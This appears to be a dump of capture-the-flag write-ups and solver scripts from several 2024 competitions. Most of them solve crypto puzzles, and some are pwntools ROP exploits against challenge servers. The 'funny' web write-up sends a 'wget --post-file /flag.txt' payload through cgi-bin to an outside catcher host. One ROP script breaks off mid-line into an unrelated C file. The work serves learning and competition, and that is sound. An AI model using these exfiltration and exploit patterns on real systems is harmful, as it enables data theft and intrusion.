1) Remove the `c` characters from every other index 12 | 2) Unhex to recover the flag 13 | 14 | ```python 15 | #!/usr/bin/env python3 16 | 17 | from binascii import unhexlify 18 | 19 | with open("ccccc.txt", "r") as f: 20 | c = f.read() 21 | 22 | flag = "" 23 | for i in range(0, len(c), 2): 24 | flag += c[i] 25 | 26 | flag = unhexlify(flag)[:-1].decode() 27 | 28 | print(flag) # TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47} 29 | ``` 30 | 31 | ## Flag 32 | `TFCCTF{cshout_cout_ct0_cmy_cb0y_c4nd_cmy_cdog_cand_cmy_cc47}` 33 | 34 | smiley 2024/08/03 35 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/conway/conway.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/crypto/conway/conway.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/conway/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import hashlib 4 | from binascii import unhexlify 5 | from Crypto.Cipher import AES 6 | from Crypto.Util.Padding import unpad 7 | 8 | def A005150(n): 9 | """from https://oeis.org/A005150""" 10 | p = "1" 11 | seq = [1] 12 | while (n > 1): 13 | q = '' 14 | idx = 0 # Index 15 | l = len(p) # Length 16 | while idx < l: 17 | start = idx 18 | idx = idx + 1 19 | while idx < l and p[idx] == p[start]: 20 | idx = idx + 1 21 | q = q + str(idx-start) + p[start] 22 | n, p = n - 1, q 23 | seq.append(int(p)) 24 | return seq 25 | 26 | initial = A005150(16)[-1] 27 | 28 | h = hashlib.sha256() 29 | h.update(str(initial).encode()) 30 | key = h.digest() 31 | 32 | #print(key.hex()) # 609fd95c2155dfc76de2212c06b09f4ffa3b911d023b871f45a4eab530b393f3 33 | 34 | ct = 
unhexlify("f143845f3c4d9ad024ac8f76592352127651ff4d8c35e48ca9337422a0d7f20ec0c2baf530695c150efff20bbc17ca4c") 35 | 36 | cipher = AES.new(key, AES.MODE_ECB) 37 | flag = unpad(cipher.decrypt(ct), 16).decode() 38 | 39 | print(flag) # TFCCTF{c0nway's_g4me_0f_sequences?} 40 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/genetics/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | with open("task.txt", "r") as f: 4 | c = f.read() 5 | 6 | c = c.replace(" ", "") 7 | c = c.replace("\n", "") 8 | 9 | c = c.replace("A", "0") 10 | c = c.replace("C", "1") 11 | c = c.replace("G", "2") 12 | c = c.replace("T", "3") 13 | 14 | flag = "" 15 | 16 | for i in range(0, len(c), 4): 17 | flag += chr(int(c[i:i+4], 4)) 18 | 19 | print(flag) # TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n} -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/genetics/task.txt: -------------------------------------------------------------------------------- 1 | CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC 2 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/crypto/genetics/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # Genetics (crypto) 4 | 5 | I just took a quick look at my DNA. I feel like I was created for this CTF. 
6 | 7 | CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC 8 | 9 | ## Analysis 10 | 11 | The given text appears similar to the most common [DNA digital data store encoding](https://en.wikipedia.org/wiki/DNA_digital_data_storage). 12 | 13 | This is a base 4 encoding. 14 | 15 | ## Solution 16 | 17 | 1) Convert the letter symbols to number symbols 18 | 2) Convert the numbers to base 10 from base 4 19 | 20 | ```python 21 | #!/usr/bin/env python3 22 | 23 | with open("task.txt", "r") as f: 24 | c = f.read() 25 | 26 | c = c.replace(" ", "") 27 | c = c.replace("\n", "") 28 | 29 | c = c.replace("A", "0") 30 | c = c.replace("C", "1") 31 | c = c.replace("G", "2") 32 | c = c.replace("T", "3") 33 | 34 | flag = "" 35 | 36 | for i in range(0, len(c), 4): 37 | flag += chr(int(c[i:i+4], 4)) 38 | 39 | print(flag) # TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n} 40 | ``` 41 | 42 | ## Flag 43 | `TFCCTF{1_w1ll_g3t_th1s_4s_4_t4tt00_V3ry_s00n}` 44 | 45 | smiley 2024/08/03 46 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/pwn/guard_the_bypass/chall.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/pwn/guard_the_bypass/chall.zip -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/pwn/guard_the_bypass/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | context.log_level = "debug" 6 | elf = ELF("./guard_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | p = elf.process() 12 | #p = elf.debug(gdbscript="b *0x401384") 
13 | #p = remote("challs.tfcctf.com", 31735) 14 | 15 | p.sendlineafter(b"Welcome! Press 1 to start the chall.\n", b"1") 16 | 17 | rop = ROP(elf) 18 | rop.raw(b"A" * 56) 19 | rop.puts(elf.got["puts"]) 20 | rop.raw(elf.sym["game"]) 21 | rop.raw(b"A" * (2096 - len(rop.chain()))) 22 | rop.raw(p64(0x3fe000)) # writable bss 23 | rop.raw(b"A" * 24) 24 | chain = rop.chain() 25 | p.sendlineafter(b"Select the len: ", str(len(chain)).encode()) 26 | p.sendline(chain) 27 | 28 | leak = struct.unpack(" 2 | #include 3 | #include 4 | #include 5 | 6 | #define NUM_WORKERS (16) 7 | 8 | void* worker(void *arg) { 9 | time_t start = (time_t)arg; 10 | char cmd[512]; 11 | sprintf(cmd, "./worker %ld %d", start, NUM_WORKERS); 12 | int rc = system(cmd); 13 | (void)rc; 14 | pthread_exit(0); 15 | } 16 | 17 | int main(int argc, char** argv) { 18 | pthread_t threads[NUM_WORKERS]; 19 | 20 | time_t now = time(0); 21 | 22 | for (int i = 0; i < NUM_WORKERS; i++) { 23 | pthread_create(&threads[i], 0, worker, (void*)(now - i)); 24 | } 25 | 26 | for (int i = 0; i < NUM_WORKERS; i++) { 27 | pthread_join(threads[i], 0); 28 | } 29 | 30 | return 0; 31 | } -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/inscount.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import string 4 | from pwn import * 5 | 6 | PIN = "/opt/pin/pin" 7 | INSCOUNT2_MT_SO = "/opt/pin/source/tools/SimpleExamples/obj-intel64/inscount2_mt.so" 8 | BINARY = "./signal" 9 | 10 | flag = b"" 11 | #flag = b"b11e800000b27dcf82e70c4bad63a3eb" 12 | 13 | while True: 14 | highest_count = 0 15 | best_byte = b"\x00" 16 | for c in "10fedcba98765432": 17 | b = c.encode() 18 | with process(argv=[PIN, "-t", INSCOUNT2_MT_SO, "--", BINARY, flag + b], level="CRITICAL") as p: 19 | lines = p.recvall().split(b"\n") 20 | 21 | count = 0 22 | for line in lines: 23 | if b"Count[" in line: 24 | count += int(line.split(b" = ")[1]) 25 | 
26 | if count > highest_count: 27 | highest_count = count 28 | best_byte = b 29 | flag += best_byte 30 | log.success(flag.decode()) 31 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/signal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_08_03_TFCCTF24/rev/signal/signal -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/rev/signal/worker.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | char const* alpha = "abcdef0123456789"; 7 | 8 | int main(int argc, char** argv) { 9 | char flag[32]; 10 | time_t start = (time_t)atoi(argv[1]); 11 | int step = atoi(argv[2]); 12 | time_t now = start; 13 | 14 | printf("start: %ld step: %d\n", start, step); 15 | 16 | for ( ; ; ) { 17 | srand(now); 18 | for (int i = 0; i < 32; i++) 19 | flag[i] = alpha[rand() & 0xf]; 20 | if (memcmp(flag, "b11e8", 5) == 0) { 21 | if (memcmp(&flag[10], "b27dc", 5) == 0) { 22 | printf("[%s]\n", flag); 23 | if (memcmp(&flag[10], "b27dcf82e70c4bad63a3eb", 22) == 0) { 24 | printf("%s\n", flag); // TFCCTF{b11e807f65b27dcf82e70c4bad63a3eb} 25 | break; 26 | } 27 | } 28 | } 29 | now -= step; 30 | } 31 | return 0; 32 | } -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/web/funny/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # funny (web) 4 | 5 | cgi-bin stuff 6 | 7 | ## Solution 8 | 9 | ```conf 10 | ScriptAlias /cgi-bin /usr/bin 11 | ``` 12 | This directive maps the URL path `/cgi-bin` onto `/usr/bin`, so any binary in that directory can be executed as a CGI program through an HTTP path. 
13 | It took some trial and error to get it working; I wonder if it can also be solved with awk. 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | import requests 18 | from urllib.parse import quote, quote_plus 19 | 20 | REMOTE = "http://challs.tfcctf.com:31311/" 21 | 22 | payload = f"wget?--post-file+/flag.txt+https://lalalalalallalala.requestcatcher.com/" 23 | res = requests.get(REMOTE + f"cgi-bin/{payload}", proxies={ 24 | 'http': 'http://0.0.0.0:8080', 25 | 'https': 'https://0.0.0.0:8080' 26 | }) 27 | print(res.text) 28 | ``` 29 | 30 | ## Flag 31 | `TFCCTF{1_4lm0st_f0rg0t_t0_push_th1s_fl4g_t0_th3_c0nt4in3r}` 32 | 33 | shafouz 2024/08/03 34 | -------------------------------------------------------------------------------- /2024_08_03_TFCCTF24/web/surfing/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2423 2 | 3 | # surfing (web) 4 | 5 | Google redirects 6 | 7 | ## Solution 8 | 9 | Very interesting challenge: you send an email to yourself in Gmail to get the `usg` parameter. 10 | With it you can use Google as an open redirect. 11 | A `#` at the end is needed for some reason. 
12 | 13 | ```python 14 | import requests 15 | from urllib.parse import quote_plus, quote 16 | 17 | part2 = "https://ca14-2804-1b3-8146-8451-d3ef-cb85-2b79-23d7.ngrok-free.app&source=gmail&ust=1722697936722000&usg=AOvVaw3Djb1BbeFhNoc5_At0Cbfe#" 18 | part2 = quote_plus(part2) 19 | payload = "http://google.com/url?q=" + part2 20 | 21 | burp0_url = "http://challs.tfcctf.com:31595/get" 22 | 23 | res = requests.get(burp0_url, params=f'url={payload}', proxies={ 24 | 'http': 'http://0.0.0.0:8080', 25 | 'https': 'https://0.0.0.0:8080' 26 | }) 27 | print(f"DEBUGPRINT[1]: go.py:6: res.text={res.text}") 28 | 29 | 30 | ``` 31 | 32 | ## Flag 33 | `TFCCTF{18fd102247cb73e9f9acaa42801ad03cf622ca1c3689e4969affcb128769d0bc}` 34 | 35 | shafouz 2024/08/03 36 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/README.md: -------------------------------------------------------------------------------- 1 | # LITCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2444 4 | 5 | 604th place 333 points 6 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/crypto/chal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from Crypto.Util.number import long_to_bytes as ltb, bytes_to_long as btl, getPrime 3 | 4 | p = getPrime(1024) 5 | q = getPrime(1024) 6 | 7 | n = p*q 8 | 9 | e = p 10 | 11 | with open("flag.txt", "rb") as f: 12 | PT = btl(f.read()) 13 | 14 | CT = pow(PT, e, n) 15 | print(f"{CT = }") 16 | 17 | for _ in range(4): 18 | CT = pow(int(input("Plaintext: ")), e, n) 19 | print(f"{CT = }") 20 | -------------------------------------------------------------------------------- /2024_08_10_LITCTF24/crypto/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from math import gcd 5 | 6 | def modinv(a, m): 7 | return pow(a, -1, m) 8 | 9 | 
#context.log_level = "debug" 10 | 11 | #p = remote("litctf.org", 31783) 12 | p = process(["python3", "./chal.py"]) 13 | 14 | p.readuntil(b"CT = ") 15 | flag_ciphertext = int(p.readline()) 16 | 17 | p.sendlineafter(b"Plaintext: ", str(-1).encode()) 18 | p.readuntil(b"CT = ") 19 | n = int(p.readline()) + 1 20 | 21 | m1 = 21 22 | p.sendlineafter(b"Plaintext: ", str(m1).encode()) 23 | p.readuntil(b"CT = ") 24 | c1 = int(p.readline()) 25 | 26 | m2 = 22 27 | p.sendlineafter(b"Plaintext: ", str(m2).encode()) 28 | p.readuntil(b"CT = ") 29 | c2 = int(p.readline()) 30 | 31 | # sometimes we get e * 2 instead of e 32 | e = gcd(m1 - c1, m2 - c2) 33 | d = modinv(e, (e - 1) * ((n // e) - 1)) 34 | 35 | # so.. sometimes this doesn't work 36 | flag = pow(flag_ciphertext, d, n) 37 | flag = flag.to_bytes(length=(flag.bit_length() + 7) // 8, byteorder="big") 38 | 39 | log.success(flag.decode()) 40 | 41 | -------------------------------------------------------------------------------- /2024_08_17_idekCTF24/README.md: -------------------------------------------------------------------------------- 1 | # idekCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2304 4 | 752nd place 100 points 5 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals 2024 Writeups 2 | 3 | https://ctftime.org/event/2398 4 | 5 | 225th place 1208 points 6 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/cbc/app.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad, unpad 2 | from Crypto.Cipher import AES 3 | import os 4 | 5 | def decrypt(txt: str) -> (str, int): 6 | try: 7 | token = bytes.fromhex(txt) 8 | 9 | c = AES.new(os.environ["AES_KEY"].encode(), AES.MODE_CBC, iv=os.environ["AES_IV"].encode()) 10 | plaintext = 
c.decrypt(token) 11 | unpadded = unpad(plaintext, 16) 12 | 13 | return unpadded, 1 14 | except Exception as s: 15 | return str(s), 0 16 | 17 | def main() -> None: 18 | while True: 19 | text = input("Please enter the ciphertext: ") 20 | text.strip() 21 | out, status = decrypt(text) 22 | if status == 1: 23 | print("Looks fine") 24 | else: 25 | print("Error...") 26 | 27 | if __name__ == "__main__": 28 | main() 29 | 30 | 31 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/msg1.enc: -------------------------------------------------------------------------------- 1 | c = 161657267735196834912863135763588255051084768060167522685145600975477606522389267911595494255951389308603585891670155516473228040572472139266242046480464411011926872432857745283026840801445383620653451687523682849171134262795620963422201106957732644189004161198543408780876818402717692426183521358742475772803427948145681912577138151854201287217310388360035006450255979612146528569192238510701666997268424852524879191797074298541592238357746219444160311336448978081899531731524195638715227224903445226248602579764214997719090230906191407229446647313099400956970509035654967405630240939959592998616003498236942092817559461000588623573048030445521863492730870242644395352424593752773001495951737895664115609421618170689951704330184048125307163740226054228480085636314748554185748105182003072934516641741388554856693783207538862673881733984454590126630762754413784860309730736733101522402317095930278893263812433036953457501549714213711757368647750210251899325644773678135753158374375837529620580830355398764871600754340989211159192515899566042173210432362519000596760898915443009768635625263875643978408948502726014770826616858752941269838500371205265923373317700072776319154266968103160778573051363936325056002056286215658714259892131 2 | -------------------------------------------------------------------------------- 
/2024_09_06_CSAWQuals24/crypto/trapdoor/msg2.enc: -------------------------------------------------------------------------------- 1 | c = 494623168173341363340467373358957745383595056417571755948370162317759417390186160270770025384341351293889439841723113891870589515038055355274713359875028285461281491108349357922761267441245606066321766119545935676079271349094728585175909045924367012097484771776396598141703907624715907730873180080611197080012999970125893693838478647963157490065546947042621326070901482489910203413759703603136944502613002083194569025640046380564488058425650504612206627739749051853591610981053026318569730551988841304231276711969977298162726941928222523464544797141812329957714866356009363861914935745207975118182966833811723664044706845207847731129336219505772833893718601825819419057471717431953601897992835582033908346998397116046369365580899868759006665351628889935594587647946796811554073758809039163703319444890860711787316692186294350180062910771860180483152240985537326837665737974072086105081591429007858987697382766650868798693024212101169297652870122729568327958629779258375463408029863902774673729692698603549762248768090302360950262068792179771304874203556781584256503067131440856389473604578859795120178476492827306744971082872861030028803971595639553063854220185280566575307797482645881434704155764917254239587927218075951473385530833 2 | -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/public_key1: -------------------------------------------------------------------------------- 1 | e = 65537 2 | n = 
537269810177819460077689661554997290782982019008162377330038831815573146869875494409546502741769078888560119836988893807659619131795600022996155542011901767164659622251852771410530047820953404275439162903782253582402317577272023052873061733154947413969140900242586288282386516940748102303139488999388815366805771566027048823971232923901589854972341140497344922557809346957285480088567527430942352224246175865278666886538920772608403444601667114300055814252644535406924681931233694920723837668899531758291081568304763353729111948368345349994099868469305792181073122419940610781784779666456780500932337154438538720823939250386789917476722260336949625831449027815346423132208841389383282133423240342633209093536658578807788187537292687621305485734565276685038174693348234827761258142100019798785254244633108887403538365377022084266245064851786520352683721896084403163679116876924559581709943841877168418550922700610256010165841228197765129411475811684669156709601802234298096100301516880419138890353002776631827361005170877640327516465104169299292924318171783865084478980121378972145656688829725118773293892358855082049175572479466474304782889913529927629420886850515337785270820884245044809646784251398955378537462225157041205713008379 -------------------------------------------------------------------------------- /2024_09_06_CSAWQuals24/crypto/trapdoor/public_key2: -------------------------------------------------------------------------------- 1 | e = 65537 2 | n = 
675112413040615754855341368347991520700645749707972662375138119848808538466484973026629442817490775679486087477873647170707728077849174294413106449041183548981099164777126469098349759962366886352375485394430924686294932854410357033579891793697466117311282071223849125728247324019661552591602816412461639181036083039951358738639409104870090776274099206184327026885209301129700589120263558741373320717866973004474880824451611558352986814186406024139122101780061421498582804842387331594088633719788918481809465044314609904522824483927173924396330723272200351268059583559155873089840203176526189465332287149408627146863937339106591410131104971158916770664709755851365697530033135116269758729627681863469646687585133174854282299126206393656205822175860114547244407037919126445577158000448033562711159480289599400271620922791664179514807098083591794558148460941940996477066832640360820650342057071277962750427121243576612067919616033880922920641430414655749007393524344586517489346008845986135281381956392366857764758769758991862758292829265731964283719870708510272500471228442964550074672417445262035130720875562744233719280755235051883245392409892775011413342074824090752055820699150296553380118608786447588243723987854862785887828651597 -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/README.md: -------------------------------------------------------------------------------- 1 | # PatriotCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2426/ 4 | 5 | 229th place 1880 points 6 | 7 | -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/bit_by_bit/transmit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | 4 | blocksize = 16 5 | 6 | def loadMessage(): 7 | message = "" 8 | with open("message.txt","r",encoding='utf-8') as file: 9 | for line in file: 10 | message += line 11 | while len(message) % blocksize 
!= 0: 12 | message += '0' 13 | return message 14 | 15 | def encode(chunk): 16 | start = 120 17 | encoded = 0 18 | for c in chunk: 19 | encoded = encoded | (ord(c)< ", plaintext) 11 | p.readuntil(b"> ") 12 | return bytes.fromhex(p.readline().decode()) 13 | 14 | def get_next_byte(flag): 15 | prefix_len = (16 - (1 + len(flag))) % 16 16 | prefix = b'A' * prefix_len 17 | length = prefix_len + len(flag) + 1 18 | ciphertext = encrypt(prefix) 19 | for c in printable: 20 | fake = encrypt(prefix + flag + bytes([ord(c)])) 21 | if fake[:length] == ciphertext[:length]: 22 | return bytes([ord(c)]) 23 | return b'' 24 | 25 | flag = b"" 26 | for i in range(32): 27 | flag += get_next_byte(flag) 28 | print(flag.decode()) # pctf{ab8zf58} 29 | -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/high_roller/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_20_PatriotCTF/crypto/high_roller/flag.enc -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/high_roller/gen_setup.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_20_PatriotCTF/crypto/high_roller/gen_setup.7z -------------------------------------------------------------------------------- /2024_09_20_PatriotCTF/crypto/idk_cipher/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from base64 import b64decode 4 | from struct import pack 5 | 6 | key = b"secretkey" 7 | ciphertext = b64decode(b"QRVWUFdWEUpdXEVGCF8DVEoYEEIBBlEAE0dQAURFD1I=") 8 | 9 | x = b"" 10 | key_idx = 0 11 | 12 | for i in range(0, len(ciphertext), 2): 13 | x += pack("B", ciphertext[i] ^ key[key_idx]) 14 | 
key_idx = (key_idx + 1) % len(key) 15 | 16 | y = b"" 17 | key_idx = 0 18 | 19 | for i in range(1, len(ciphertext), 2): 20 | y += pack("B", ciphertext[i] ^ key[key_idx]) 21 | key_idx = (key_idx + 1) % len(key) 22 | 23 | flag = b"pctf{" + x + y[::-1] + b"}" 24 | 25 | print(flag.decode()) # pctf{234c81cf3cd2a50d91d5cc1a1429855f} 26 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/README.md: -------------------------------------------------------------------------------- 1 | # BuckeyeCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2449 4 | 5 | 155th place 720 points 6 | 7 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/hashbrown/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from Crypto.Cipher import AES 5 | 6 | #context.log_level = "debug" 7 | p = remote("challs.pwnoh.io", 13419) 8 | 9 | p.readuntil(b"hex:\n") 10 | message = bytes.fromhex(p.readline().decode()) 11 | message += b"_" * (16 - len(message) % 16) 12 | 13 | p.readuntil(b"Signature:\n") 14 | key = bytes.fromhex(p.readline().decode()[-33:-1]) 15 | 16 | french_fry = b"french fry" 17 | padded_french_fry = french_fry + (b"_" * (16 - len(french_fry) % 16)) 18 | 19 | p.sendlineafter(b"> ", (message + french_fry).hex().encode()) 20 | 21 | forgery = AES.new(key, AES.MODE_ECB).encrypt(padded_french_fry) 22 | p.sendlineafter(b"> ", forgery.hex().encode()) 23 | 24 | p.readuntil(b"flag:\n") 25 | 26 | # bctf{e7ym0l0gy_f4c7_7h3_w0rd_hash_c0m35_fr0m_7h3_fr3nch_hacher_wh1ch_m34n5_t0_h4ck_0r_ch0p} 27 | print(p.readline().decode()[:-1]) 28 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | e = 65537 4 | n = 
66082519841206442253261420880518905643648844231755824847819839195516869801231 5 | c = 19146395818313260878394498164948015155839880044374872805448779372117637653026 6 | 7 | # https://factordb.com/index.php?query=66082519841206442253261420880518905643648844231755824847819839195516869801231 8 | # 9 | # can also factor with sage in ~3 minutes on my machine 10 | # sage: n = 66082519841206442253261420880518905643648844231755824847819839195516869801231 11 | # sage: n.factor() 12 | # 213055785127022839309619937270901673863 * 310165339100312907369816767764432814137 13 | 14 | p = 213055785127022839309619937270901673863 15 | q = 310165339100312907369816767764432814137 16 | assert((p * q) == n) 17 | 18 | phi = (p - 1) * (q - 1) 19 | d = pow(e, -1, phi) 20 | 21 | m = pow(c, d, n) 22 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8, byteorder="big").decode() 23 | print(flag) # bctf{f4c70r1z3_b3773r_4d3b35e4} 24 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/rsa/rsa.py: -------------------------------------------------------------------------------- 1 | import Crypto.Util.number as cun 2 | import math 3 | 4 | message = b"bctf{fake_flag}" 5 | 6 | m = int.from_bytes(message, "big") 7 | 8 | p = cun.getPrime(128) 9 | q = cun.getPrime(128) 10 | e = 65537 11 | 12 | n = p * q 13 | phi = (p - 1) * (q - 1) 14 | d = pow(e, -1, phi) 15 | assert (e * d) % phi == 1 16 | assert math.gcd(e, phi) == 1 17 | 18 | c = pow(m, e, n) 19 | 20 | print(f"e = {e}") 21 | print(f"n = {n}") 22 | print(f"c = {c}") 23 | 24 | """ 25 | Output: 26 | e = 65537 27 | n = 66082519841206442253261420880518905643648844231755824847819839195516869801231 28 | c = 19146395818313260878394498164948015155839880044374872805448779372117637653026 29 | """ 30 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/go.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from xnor import * 4 | 5 | message = b'Blue is greener than purple for sure!' 6 | message_enc = bytes.fromhex("fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8") 7 | key = xnor_bytes(message_enc, message) 8 | 9 | flag_enc = bytes.fromhex("de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4") 10 | flag = xnor_bytes(flag_enc, key) 11 | 12 | print(flag.decode()) # bctf{why_xn0r_y0u_b31ng_so_3xclu51v3} 13 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # xnor (crypto) 4 | 5 | XNOR! Its like XOR, but its actually the complete opposite. 6 | 7 | ## Analysis 8 | 9 | We are given the result of encrypting both a known plaintext and a flag with the same key. The method of encryption is to apply the xnor operation to each bit. Since XNOR is XOR with the output bits inverted, reusing the key has the same consequence as reusing an XOR keystream: one known plaintext/ciphertext pair is enough to recover the key. 10 | 11 | ## Solution 12 | 13 | 1) Recover the key by xnoring the encrypted message with the known plaintext 14 | 2) Recover the flag by xnoring the encrypted flag with the key 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | 19 | from xnor import * 20 | 21 | message = b'Blue is greener than purple for sure!' 
22 | message_enc = bytes.fromhex("fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8") 23 | key = xnor_bytes(message_enc, message) 24 | 25 | flag_enc = bytes.fromhex("de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4") 26 | flag = xnor_bytes(flag_enc, key) 27 | 28 | print(flag.decode()) # bctf{why_xn0r_y0u_b31ng_so_3xclu51v3} 29 | ``` 30 | 31 | ## Flag 32 | `bctf{why_xn0r_y0u_b31ng_so_3xclu51v3}` 33 | 34 | smiley 2024/09/28 35 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/crypto/xnor/xnor_output.txt: -------------------------------------------------------------------------------- 1 | Key: [[REDACTED]] 2 | 3 | Message: b'Blue is greener than purple for sure!' 4 | Enrypted message: fe9d88f3d675d0c90d95468212b79e929efffcf281d04f0cfa6d07704118943da2af36b9f8 5 | 6 | Flag: [[REDACTED]] 7 | Encrypted flag: de9289f08d6bcb90359f4dd70e8d95829fc8ffaf90ce5d21f96e3d635f148a68e4eb32efa4 8 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/calculator/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/calculator/calc -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/calculator/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./calc", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript=" b main") 11 | p = remote("challs.pwnoh.io", 13377) 12 | 13 | p.sendlineafter(b"operand: ", b"1") 14 | p.sendlineafter(b"operator: ", b"*") 15 | p.sendlineafter(b"operand: ", b"pi") 16 | p.sendlineafter(b" use: ", 
